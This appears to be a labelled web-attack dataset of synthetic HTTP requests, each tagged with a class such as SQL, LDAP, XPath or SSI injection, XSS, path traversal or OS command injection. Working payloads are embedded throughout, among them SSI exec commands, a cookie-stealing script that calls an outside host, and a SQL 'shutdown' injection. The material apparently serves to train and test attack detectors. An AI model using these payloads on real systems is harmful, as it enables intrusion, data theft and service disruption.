If-None-Match: "uAg.IwSjd.ygslwAVdGY"
If-Range: *
Max-Forwards: 31
Pragma: no-cache
Proxy-Authorization: NTLM Tnh0YVM2YXRsVWFldGduc21lZmlkbm9uZGFpZW5zbk5HSXJ1eDRXaGhr
Authorization: Basic Y1Jzb3RsaTpyb3duZg==
Range: 7-1281,22479-
Referer: http://www.xywUHo.de/ger6mEi.nsf
TE: trailers,chunked
User-Agent: g2Gaoi5 http://www.xeleoaAy.gov
UA-Disp: 3250,7812,32
UA-Color: color16
Via: 6.5 www.9ofiJs.jpg
Transfer-Encoding: identity
Warning: 524 216.140.150.200 "ytojircesetlOqieus" 
----: --------------------

aoiw7aosE4lfan4=scriptru?&HmetaC4HRXnph-A7UP=9337325168&rlocationUbUL=64&c8=12727&ogifLe=edocumentoin&@QUl=o_rwc&3dtAynneuekknl=c7d5de&tce=3&cichhgsthet2ohk=<!-- #exec  cmd="c:\progra~1\ecqrwtdO\8oj9esOnCl\0dn.exe   d:\rdpuasvbc\www.onilen.org\Ei\database.mdb  /x   exporttofoxpro"-->&9EmdK8vghiptil=nw&q0ufC=4026866346&Eeiai=qWFSuL&Db8Iurg=10slfhsRs2&1fxsboss4=9&iab7TvreMaoO8= w

End - Id: 40255
Start - Id: 36944
class: LdapInjection
PUT /bfebet/awZhNaalu0tsmn7ocl/mmmtq4mzn/tQSu3IV3MD/rWWYNKAx8oM/thibunhcodpaSade/nrm1etcpDaHnb/uVLb_txg/qkchz19dv2r/oa6omuTgsi7mn/i3.shtml? HTTP/1.0
Content-Length: 110
Content-Language: ejhmiosr,eiAitr,uo07
Content-Encoding: gzip
Content-Location: /pbtic.jpg
Content-MD5: c3JyZW5kYXJwYWhlaURlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Apr 05 15:36:49 UTC
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: www.iseteny.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 211.137.222.198
Cookie: rG=04089;t3bmr3bteIa56oz=m dfd;jnksrEturzxeo9=s Jnebft
Cookie2: $Version="3"
Date: Tue, 19 May 09 10:10:39 UTC
ETag: W/"YK_XCnnOb-dTLdys0E7O"
Expect: 100-continue
From: ohnue@asue.fr
If-Modified-Since: Sun, 01 Jan 06 15:22:10 CET
If-Unmodified-Since: Thu, 18 Mar 10 22:22:38 GMT
If-Match: "U@qwX44gMrekPKD"
If-None-Match: *
If-Range: Tue, 21 Dec 04 16:23:14 UTC
Max-Forwards: 539
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="Srg4"
Range: 060649-
Referer: /ires/m7v2ttpb/beswatbn/ldBic.php4
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: cOvxpzYP8J http://www.Zinegaka.org
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 8.2 5.78.241.105:8678, 6.2 www.coranqsi.html, FTP/6.8 26.40.18.134
Transfer-Encoding: gzip
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

si2saTe8ieti=htrt)( |  (dci=*)&ghva=jrd5auat&8osavSHrliznna=trdwgetsagsrotu&iP=1RbetweeneLonfin2jR

End - Id: 36944
Start - Id: 46664
class: XSS
GET /tX2KdIHA3CaN_w-B/oui.mdb?3wnllchte0lhOla=3933&mwssadt1=77&b8CAN3=aV3b&cofA19j=pxpuoptpErbIw&JKFM5Mxterm=78nhtr7ErpEnaEdtt&xne=42&eTtrhinkarna=A&ThaDtaEeYDmkate=ikyHW&drnntris=tkZaTv9U1&c4=57740&kiSgi0us=rbcGc2&inVchildY8B=eldel&u3Ssir=oshnsnadrtin HTTP/1.0
Host: www.fhtctrzahd.ch:921
Connection: nountdrl
Accept: image/*, audio/*, application/*;q=0.8
Accept-Charset: iso-2022-jp;q=0.6, iso-8859-2;q=0.5
Accept-Encoding: *
Accept-Language: 6r-ltt
Cache-Control: no-cache
Client-ip: 121.230.123.248
Cookie: qFX@2_P=<img     src =  "  livescript:[document.location.replace   ('http://www.deatne.com/cgi-bin/ndieonns.cgi'+document.cookie);]   ">
Cookie2: $Version="5"
Date: Sat, 21 Jun 08 19:45:07 GMT
ETag: "5zQ01NH@dpA_r7g8e"
Expect: 100-continue
From: os7ddt@2hedt3.cz
If-Modified-Since: Tue, 20 Apr 10 17:10:17 UTC
If-Unmodified-Since: Sun, 13 Feb 05 22:30:50 CET
If-Match: *
If-None-Match: "D.qlHhdZPu01Y_RtlCI"
If-Range: "3w5qskhneCb7bLj5NH6X"
Max-Forwards: 066
MIME-Version: 9.3
Pragma: o6yMetse='yugeLr'
Proxy-Authorization: Digest nc=BdfD5Ba4
Authorization: Digest username="oaseou"
Range: -618819
Referer: http://dnzoaals.net/oteeect/aluDnCa.jsp
TE: chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: rmyot.R http://www.sgdoii.cz
UA-CPU: PowerPC
UA-OS: Linux
UA-Color: color32
Via: 7.8 249.60.46.84
Transfer-Encoding: gzip
Upgrade: jfsfE/6.0, acuv/2.3, ntS3e/0.4
Warning: 212 www.ee2Ee.js "iuaewa4tc" 
X-Forwarded-For: 216.174.136.108
X-Serial-Number: 64753281
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46664
Start - Id: 47613
class: XSS
GET /xkS2-KvB7fL4P-MRFkB/5F56A49QX8a/roGxae.1qO97URiOy/svE2edse6es5nMNAtf4o/isX/ageexa/e-fehtX.sh?zrcopyYRrFfb3=%3Cbgsound+src%3D++%22++javascript%3A++%5Balert%28%27sdNahwm%27%29%3B%5D+++%22+%3E&04roolr=nShz7si&3HSynasxs=6e3ane4x&KJu6_FeUqfxf=%26itwpp&acceptw5Z=gdo0selecta&fpnfedTse7j6iEs=eemIsterooan8&cascw0eecetu7ta=aee&grxde5weenu=ar%3D%40yw%7CTeuiperlr&erae=011054&ychttu6xaoegs=auqeuvse1s&yp3zAl0AN=1260890915&naeotiw=08235&6miLiors=%29a0Ectthh0taet&9j=rwNueahitrtoftt&ttwehhnjne=e7s5AnrOtEo3zur2i HTTP/1.1
Host: www.0inhBcaa.ch
Connection: keep-alive
Accept: image/gif;q=0.2, video/*
Accept-Charset: isiri-3342, euc-kr
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=990
Client-ip: 254.77.17.52
Cookie: hsiiooarr=positionx;tpcoliMSk=848;bbN1nddofTe=7nAtzt;be=defiedelete;cozan2=s|Ee%;o0of5=yl7e@TDv@E
Cookie2: $Version="47"
Date: Wed, 01 Nov 06 03:33:25 UTC
ETag: "@Xjp1ovKWikgKE4aj"
Expect: 100-continue
From: urg9ebr@loeuenugsj.fr
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 03 Mar 08 02:30:33 UTC
If-Match: "AlnZlixlOIErmXKEI"
If-None-Match: *
If-Range: Mon, 03 Jul 06 05:25:50 GMT
Max-Forwards: 602
MIME-Version: 8.3
Pragma: rqrr=aMkr8
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: stytDk y6UaAez=reaatl
Range: 393273-
Referer: http://www.reios.be/etIi4pjt/hredEd/ehrahpl.avi
TE: gzip;q=0.2,trailers,trailers
Trailer: Expect
User-Agent: nne7icn/3.5.4.2
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 608x141
Via: odqFet/0.8 42.129.81.157
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47613
Start - Id: 49732
class: XPathInjection
GET /rsemswenji8/.-w/kUtXHN-H/S8libD6hQg4a/CpassthrutVbrvpoT./4jLZ41XUJpeE/1@u2U-BfEPphga/K2N.-M.shtml?eydexri=18t&Mt44vbscript.QB=rS5e%5Dr%7E&aisost1gr=oldknyoi%7Ch&tea=limthsrt&liIEy=teh&itwfdaotbyNa=%28i+++%3C++count%28dd%2Fchild%3A%3Atext%28%29%29++and+++j++++%3C+++count%28rln%2Fchild%3A%3Acomment%28%29%29++and+++++k+++%3C++++count%28ovaob%2Fchild%3A%3A*%29++++%29&sl=a71cFgPWy_&rh11x2Ndl8oa2tr=%26uiaqeirDiohtAr&z.uaccept=%3FcaeTOeWao-i%26&hxZvclents=Uihr&5otmnb=smtea HTTP/1.1
Host: www.Afcotf.fr
Connection: close
Accept: text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: i='eatpaje'
Client-ip: 24.134.122.55
Cookie: csee2hyes5oe1e=aipTSl;eerme=vVeB_Qlo;Gyformupdate6e4Q2.=tropenntae  %
Cookie2: $Version="05"
Date: Fri, 07 Apr 06 18:54:03 UTC
ETag: "JYMP4D0.htFnvfn"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 14 Mar 10 06:15:11 UTC
If-Unmodified-Since: Wed, 23 Aug 06 23:38:54 UTC
If-Match: *
If-None-Match: "A5d0@9cR@oiQehAe"
If-Range: "bEMJFhfkl9syM@SEvl"
Max-Forwards: 4138
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: http://www.tl9i7iO.biz/hwraNtre/dtDt6.js
TE: trailers,gzip
Trailer: Connection
User-Agent: a2DDELLl http://www.alwWn.cz
UA-CPU: StrongARM
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 334x787
Via: FTP/6.9 40.144.136.140, FTP/9.4 107.121.180.27
Transfer-Encoding: compress
Upgrade: Nxie/2.9, waree/1.4, eaTli/1.5
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49732
Start - Id: 38964
class: LdapInjection
GET /RBheaicegedsnoxB/QcYK/enenIcesRs7ad9tuti/vJd3sBNechov_/sWDStq6V2/ePgIo/oVKvicMkDH._W9/27EAK/tnV_rwKqP/uH6WiJv.exe?dadminFbb0=4odoeebodyi&4havingZ8catL9WBconnectU=ttM%29%28%26%28objectClass+++%3D+fnn*%29 HTTP/1.0
Host: 172.149.189.255
Connection: keep-alive
Accept: image/jpeg;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 65.168.89.85
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="2"
Date: Tue, 23 Oct 07 19:35:47 GMT
ETag: "UHQB-TkfNTVLF8xK"
Expect: 100-continue
From: hisAka@u5t1a5.st
If-Modified-Since: Thu, 24 Apr 08 12:29:45 CET
If-Unmodified-Since: Thu, 31 Mar 05 18:15:08 UTC
If-Match: *
If-None-Match: "1DJXBMT7kEwU@7tZ@vQ"
If-Range: "vDWG5BbUkt0NAYk"
Max-Forwards: 082
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Basic Z2k4dDppc2Rzc2ZO
Range: -5662,0-2168
Referer: /hsAdc/udmarun/9taEados/weXxoe6u.pl
TE: deflate;q=0.8,chunked
Trailer: If-Match
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 3.6; dm-8T; rv:7.4.6) Gecko/71303181
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0621x5666
Via: 3.2 www.6rlelaqr.htm:661
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38964
Start - Id: 40016
class: SSI
GET /rocr/nRxeE5CK.3165PxU_/rm0aShtwbhpeijit/hkfOK6taEK/w5.js?dcp5d7n=nh&reh2v=%3C%21++%23%3C%21--++++%23exec++++cmd%3D%22id%22--%3E&fcohdhts=7828088 HTTP/1.0
Host: www.Ii8eZoriie.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 133.142.247.233
Cookie: fonM=dbeun;7oefrniellldtmt= e;pi=u45F1BL;gPtfupdatediv-hXRMI=~0ex);euun3ph=7379231
Cookie2: $Version="2"
Date: Sun, 13 Nov 05 11:09:59 GMT
ETag: W/"M_ybmZVvZ2LN3u7elOw"
Expect: ieg6l
From: l1ahde@nablau.fr
If-Modified-Since: Sun, 18 Apr 10 15:49:59 CET
If-Unmodified-Since: Fri, 09 Apr 10 13:59:57 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Sep 05 17:33:21 UTC
Max-Forwards: 167
MIME-Version: 9.8
Pragma: Odtrstob='gtHgs3'
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: rnefn thutlu0=teulA
Range: -382094,59133-7365
Referer: /xhoeAtue/tdc8.jpg
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: Mozilla/1.9 (compatible; Konqueror/2.8; Solaris; ssitwtwbto)
UA-CPU: Sparc
UA-Disp: 270,463,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5394x1347
Via: 1.2 255.233.43.117, HTTP/3.1 www.tsbith4e.html, 7.7 101.97.156.116
Transfer-Encoding: gzip
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40016
Start - Id: 41841
class: SqlInjection
GET /unionBJ7ceMstmppOgt/tCFpWZ@kPgvYG/6tdheii8staiafi/c4C0A341X6fcYybA9b/Qbq0OQjtwgBmiE/nB2WEXBgCwg/anP6YncNto.php?3rhhgtsoumtmle=4&tsaeh7olevw=ye&Ernuendfcohuxs=tXcWOK&Rio9pE6ait7hru=cj2bYOMROaEm&pIfdveai=93659895&1qw6=%27+++++%2F**%2F+++OR+++%2F**%2F+++%27dzpp%27++++%3E+%27S&haodwast0ates8=tea&slA=eferoae2ee&t4r=Hg%26sr&ilg=3o7ea HTTP/1.0
Host: www.4r6Lugferl.be:5
Connection: hbe2ir
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 196.90.56.27
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Sun, 02 Nov 08 09:02:54 UTC
ETag: "Pcy6CIpDuU4di8br"
Expect: 3esf
From: rhserwr@eoSaan.it
If-Modified-Since: Sun, 17 Sep 06 13:50:27 GMT
If-Unmodified-Since: Sat, 01 Jan 05 21:53:37 UTC
If-Match: "wpeagd3IDuXBc1YC"
If-None-Match: *
If-Range: "Uwh5z.l.LfcAi4HSGr"
Max-Forwards: 37
MIME-Version: 1.6
Pragma: kyzo='za'
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: heea seltmfr=o7On
Range: -0842
Referer: /brhmw/mshi/eridz.php3
TE: chunked;q=0.0,gzip;q=0.4,gzip;q=0.3
Trailer: Max-Forwards
User-Agent: tvtt1p (uOgInqwaz; t8ZYuH; 75plhRDkOs; uEyyG5)
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/7.0 www.sdiMcdb.jpg:7, 3.0 246.96.49.78
Transfer-Encoding: identity
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 905 112.14.120.88 "oDrineNkeu" "Sat, 31 Jan 04 09:06:11 UTC"
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 431124702375
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41841
Start - Id: 39558
class: SSI
PUT /9QB2usr/fo4/anmUhoctavLwohde1tn/l4H1y9/4taetawynv7ufsuaro.aspx? HTTP/1.0
Content-Length: 220
Content-Language: kaaj1
Content-Encoding: deflate
Content-Location: http://www.oa0zhues.cz/teaem0/eeNasuH/aoe89nh.mdb
Content-MD5: bnIxbmxpdEhPZWxodHJzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Apr 07 22:28:33 GMT
Last-Modified: Thu, 13 May 04 02:42:58 CET
Host: 248.240.83.57
Connection: n9eIuEb
Accept: audio/*;q=0.7, text/xml;q=0.9
Accept-Charset: windows-874
Accept-Encoding: compress;q=0.1
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 147.32.196.230
Cookie: diaiicCooboa=1HlT9P;ld=sN.;outr7rAa=9NstrLnn;ftt8ietaitOn=60;Ooos8=7Btmntreao;ec=CiEgerwithi
Cookie2: $Version="99"
Date: Wed, 12 Sep 07 18:02:47 CET
ETag: ".ZpMfbiUz3x2gzQ"
Expect: nmfso8Ea
From: zdt1Ooe@cVtsgan.ch
If-Modified-Since: Tue, 01 Jul 08 03:03:35 GMT
If-Unmodified-Since: Sun, 06 Sep 09 14:46:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jan 08 09:59:13 GMT
Max-Forwards: 737
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 80266-6,060-21789
Referer: /boergiWt.exe
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Referer
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 3.5; 9e-sd; rv:7.4.9) Gecko/82909295
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: 9.2 101.249.175.32, 0.8 www.ruOivEa.css
Transfer-Encoding: gzip
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

mZX64C=tdrgstlinka:r7ihn&aurtegfar=S p 8an&nssnaec=iezeIo4ereplacekmhtaccesvti&htvIsnpremec=documentyphehv&oment0ghUHhsliu=H&tAbx=<!-- #include     virtual="/etc/httpd/httpd.conf"-->&e4euStioidr= ev

End - Id: 39558
Start - Id: 44690
class: PathTransversal
POST /iKxenreoctvUkeahq/pmDxKj_4aP1/ata_tbv7/vawuniep41n/tohtebotagoton/oenVjrecrneela/r@IHAD/esbCnKGNhsMLYsRhg_AW/lhrnwageel/iwF-enJ6amGfpCR.cgi? HTTP/1.0
Content-Length: 155
Content-Language: n0i0,cnibho
Content-Encoding: deflate
Content-Location: /a5an.png
Content-MD5: bnR3c250b3RhYXJpZmFybg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jul 08 07:23:01 UTC
Last-Modified: Fri, 08 Dec 06 03:25:33 CET
Host: www.dtdas.uk
Connection: webir0rs
Accept: */*;q=0.1
Accept-Charset: windows-1254;q=0.6, iso-8859-1;q=0.0, gb2312, iso-8859-7;q=0.1, iso-8859-2;q=0.2
Accept-Encoding: 
Accept-Language: 0m3ens-ceomfaa, oOrN-a2naeeu
Cache-Control: no-cache
Client-ip: 113.128.122.99
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="90"
Date: Wed, 04 Jul 07 05:51:03 UTC
ETag: "RHf0qrb9mHL2t__f2YB"
Expect: saene=nf9tcCm
From: nC0otao@cuVsd.gov
If-Modified-Since: Fri, 02 Jul 04 24:37:04 CET
If-Unmodified-Since: Tue, 01 Dec 09 16:18:34 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 613
Pragma: no-cache
Authorization: Digest response="016A7bCC8c82e07F9B5081cbDD2064b3"
Range: 2168-,8-1607,73-
Referer: /saeace.pl
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: tith/1.0
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 562x3540
Via: hanpe/3.4 www.nFerirey.html, Ahi/0.3 231.207.250.1
Transfer-Encoding: gzip
Upgrade: eca/0.3
Warning: 868 www.gmor.js "Hn5xrhit" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: --------------------------------------------------

entgP3wlinszy=79&sg=3578043859&FC8HvF=../../../ngndor/admin.txt&hx5Wqp=paowG3HA&Iplrmtbrchrt=oe-copy0doibetweense7 y%:&1SBatmz=At&E6e5aoibNh=33

End - Id: 44690
Start - Id: 38921
class: LdapInjection
GET /t0EuvwrShI45BS5_ZHAi/eecajeud6DoTyeoj/980xNKE/wysqpE7HRnQE@xy/eInX-28DePTd/hldzf/lDbriE6yrDseotr3ute/nTCeWoFm8.eGqD_wlpB8/eadnr/a1k6-9BbQTDoM/oNlMEuSAIO.gif?xSicso7ezoll=w9AwSGZC8_&mdeowbd=rcolbEarh&ts=+ph&licuwTu=metaeun&ts4n=5988230&rdteb1nhGces5=c5eb7ns%2Ftjlt&ns3nOtc7n7h=293933615&ehpuf=iKo&ozow8dzTu=dfSamumoynaentomt&si7srplur3=elzoc&K@.72=%29%28%7C%28+++cn%3D*o%27brien*%29%28mail%3D*o++%27brien*+%29++&telavbatpOatba=Uiosntkicad2tkA&smbyt=ssK&hniaelbsgunHa=ssahsfQk7grpn0h HTTP/1.1
Host: 75.190.212.115
Connection: gnasnik6
Accept: */*;q=0.2
Accept-Charset: x-mac-chinesetrad;q=0.1, x-mac-japanese;q=0.5
Accept-Encoding: 
Accept-Language: yga9tl-bt4yl, sdtEns-en;q=0.7, nSyikpl-wobmxCri
Cache-Control: min-fresh=1353
Client-ip: 200.72.166.1
Cookie: eDvitioop8e=84737;iaa4oeRpo=i1/er;1rEeaElldtwsh=sd3iyXUGG;eosutttE=sesortnemtn8hdsihw;ueaszsilatpEr=ePhaoneEti2boinaid;rseejthEhH=05
Cookie2: $Version="625"
Date: Tue, 10 Feb 09 16:22:16 UTC
ETag: "D3E_YyiAKOdMA4jb"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Wed, 17 Mar 04 03:26:15 UTC
If-Unmodified-Since: Thu, 17 Dec 09 07:46:10 GMT
If-Match: "JjcgqV2N7Yqck7c1k7"
If-None-Match: "mxpBaSZlNMBvj9Xhe8h@"
If-Range: Thu, 17 Sep 09 04:51:04 CET
Max-Forwards: 8
MIME-Version: 7.2
Pragma: 7eHape='To8ei'
Proxy-Authorization: i69e riaS=otzepawh
Authorization: Basic TTBPZ2g2dGg6aGk3a2Fid0E=
Range: 49-,0149-664723,864-
Referer: http://fiuo.uk/fqexlsn/rBdljGt/daAlh6o/anTRTe.php4
TE: chunked;q=0.6,gzip;q=0.5
Trailer: Pragma
User-Agent: Mozilla/7.7 (compatible; nithwd; Unix; fyyes; 9afozd)
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: 6.1 www.oreohhl.shtml, 2.6 www.IOilLRQt.gif, FTP/9.6 242.111.227.227
Transfer-Encoding: gzip
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 695 www.5pter.js "oYstrefhsreaowhenept" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38921
Start - Id: 42367
class: SqlInjection
GET /tRr4i3xceaiEtmesf6.nsf?cn=%27%3B++shutdown--&tn7wH5aee=pm9k&eEcsse=09139&ouo5nho=7545219&ziehliaeRaaa=hfa%25ncuLrqo6hi HTTP/1.0
Host: 11.160.32.52
Connection: close
Accept: application/*;q=0.6, text/xml;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=18
Client-ip: 6.250.155.154
Cookie: gpigaOuleedE=46311733
Cookie2: $Version="88"
Date: Mon, 06 Sep 04 10:57:55 UTC
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: orh6@rgaag.org
If-Modified-Since: Sat, 19 Mar 05 14:56:26 CET
If-Unmodified-Since: Thu, 31 Aug 06 10:02:40 UTC
If-Match: "s0RyEy81CedupzZ"
If-None-Match: *
If-Range: "J1jbAnYAkRDfR6Jb71fO"
Max-Forwards: 14
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Digest opaque="etieea"
Range: -966,396-333,-3990
Referer: http://Ateoj.net/Aakegec.avi
TE: chunked;q=0.8,deflate,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: eal0y (e2gWvu; tG1xfK9tr; jerYEdf; sSFgt2N; 42W3nrz)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1680x018
Via: 0.9 24.65.139.68, HTTP/5.3 106.15.140.9
Transfer-Encoding: deflate
Upgrade: ptai/1.8, nrw/3.3, 5vdio/0.4, eol/0.5, rtemsh/1.9
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 222.98.17.178
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42367
Start - Id: 41893
class: SqlInjection
GET /rtJYLHD3KhrPSuk2qo/sktbns/bee/tutCe7ckIh1/r2/iRT.execIZ/fnto2ilrintsamrtrt8.pl?iEeeboN=naPy_VWPx&t6s=irpassthruzs&ciTi=rooiqf&gna=OR+++++%27ns2reN%27++%3D++N%27++%27&.ISLuThttpmailO0=cndelete HTTP/1.1
Host: www.nia12iuhbo.de
Connection: fhhesY
Accept: audio/*;q=0.9, image/jpeg;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: eTe8w-eaj7slAt, 8l-holhDuws, nia-tf, eetybee-tarte3o;q=0.2, aE0o-9ttblpO7
Cache-Control: max-age=2603
Client-ip: 143.204.36.23
Cookie: tnCbr4n7ATar= rleId;NlOhdOnp=933;e4p=4052951520
Cookie2: $Version="477"
Date: Tue, 25 Nov 08 12:53:46 GMT
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: elee@hieitj.de
If-Modified-Since: Thu, 18 Nov 04 14:22:53 UTC
If-Unmodified-Since: Sun, 14 Mar 04 07:26:05 CET
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: *
If-Range: Thu, 25 Jan 07 23:32:38 UTC
Max-Forwards: 608
MIME-Version: 7.9
Pragma: e='ekehs'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: NTLM bm5nY3pkdGkzdGNkdWh0OW5lbW90OGlpcDFtanBjOGVuZGh5ZW9jbXJsd2E=
Range: 7-,552794-,881563-
Referer: http://Hhlm1.net/3ttrtg/nlbei6i/e0eutHui.dll
TE: chunked,deflate
Trailer: TE
User-Agent: Mozilla/7.5 (compatible; Konqueror/3.8; Win 9x; yierck; VeghcyhdW; ioXineude)
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6544x276
Via: 6.3 185.42.225.104
Transfer-Encoding: gzip
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 209 99.218.44.161 "n5shpLu8ptOeAstrt7u" "Mon, 11 Feb 08 12:06:51 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41893
Start - Id: 44488
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.ktfnayttPb.cz:9864
Connection: close
Accept: image/jpeg
Accept-Charset: gb2312, iso-8859-4, x-mac-korean;q=0.1
Accept-Encoding: identity;q=0.5, gzip;q=0.9, deflate;q=0.3, identity
Accept-Language: enRtmDS-etos
Cache-Control: no-store
Client-ip: 20.163.26.161
